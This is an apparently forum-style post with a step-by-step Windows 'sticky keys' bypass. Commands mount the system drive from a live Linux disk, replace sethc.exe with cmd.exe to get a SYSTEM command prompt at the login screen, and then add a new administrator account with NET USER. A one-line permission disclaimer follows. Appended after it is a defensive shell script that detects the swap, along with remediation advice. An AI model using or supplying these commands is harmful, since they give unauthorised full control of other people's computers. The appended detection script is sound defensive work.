This is a very easy crack, allowing you to open a Windows command prompt with system privileges at log-in. It shouldn't take more than 3 minutes. It replaces sethc.exe, which can be invoked at start-up by pressing Shift five times (something to do with contrast), with cmd.exe. Since you haven't logged in yet, it opens a command prompt with system privileges (runs in BackTrack).
Code:
mkdir /mnt/ntfs
mount -t captive-ntfs /dev/hda1 /mnt/ntfs
cd /mnt/ntfs/windows/system32
mv sethc.exe sethc.old; cp cmd.exe sethc.exe
sync
cd ~
umount /mnt/ntfs
shutdown -r now
To make a new admin that you can log in to (apart from EVERYTHING else that you can do), use the following commands (replace admin with the username and pass with your password):
Code:
NET USER admin pass /add
NET LOCALGROUP administrators admin /add
Reboot and you're done.
No need to bother with cracking people's passwords (god forbid, this may take years, as with mine).
(Please only use on your own computer or with other people's permission.)
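The file swap described above leaves two traces on disk: a sethc.exe that is byte-identical to cmd.exe, and the renamed sethc.old. The script below is an added example, not part of the original post, that checks a mounted Windows volume for both; the function names check_sethc and find_ci are hypothetical, and the directory is whatever system32 path the volume is mounted at.

```shell
#!/bin/sh
# Offline check of a mounted Windows volume for the sethc.exe swap.
# Usage (after sourcing this file): check_sethc /mnt/ntfs/windows/system32

# Find a file by name ignoring case: NTFS names may differ in case
# from what a case-sensitive Linux mount expects.
find_ci() {
    find "$1" -maxdepth 1 -type f -iname "$2" 2>/dev/null | head -n 1
}

# Prints one line per finding. Return codes:
#   0 = no sign of the swap, 1 = swap indicators found, 2 = could not check
check_sethc() {
    dir=$1
    [ -d "$dir" ] || { echo "ERROR: $dir is not a directory"; return 2; }

    sethc=$(find_ci "$dir" sethc.exe)
    cmd=$(find_ci "$dir" cmd.exe)
    backup=$(find_ci "$dir" sethc.old)
    status=0

    if [ -z "$sethc" ]; then
        echo "WARN: sethc.exe missing from $dir"
        status=1
    elif [ -n "$cmd" ] && cmp -s "$sethc" "$cmd"; then
        # The accessibility binary has the same bytes as the command shell.
        echo "ALERT: $sethc is byte-identical to $cmd"
        status=1
    fi

    if [ -n "$backup" ]; then
        # The original was renamed rather than deleted.
        echo "ALERT: renamed original found at $backup"
        status=1
    fi

    [ "$status" -eq 0 ] && echo "OK: sethc.exe differs from cmd.exe, no sethc.old"
    return "$status"
}
```

A non-zero result is a reason to restore sethc.exe from known-good media and to review the local administrators group for accounts that were not provisioned by you.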